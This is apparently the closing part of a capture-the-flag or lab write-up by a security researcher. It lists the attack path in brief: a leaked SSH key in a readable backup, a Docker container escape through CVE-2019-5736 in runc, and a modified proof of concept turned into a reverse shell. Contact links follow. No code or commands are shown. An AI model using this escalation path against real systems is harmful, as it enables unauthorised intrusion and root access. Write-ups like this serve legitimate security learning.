  • SSH private key leaked in a readable backup (/var/backups/home.tar.gz)
  • Docker container escape via CVE-2019-5736 (runc), triggered by the passwordless sudo docker exec rule
  • Modifying the Go CVE-2019-5736 PoC to get a reverse shell

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…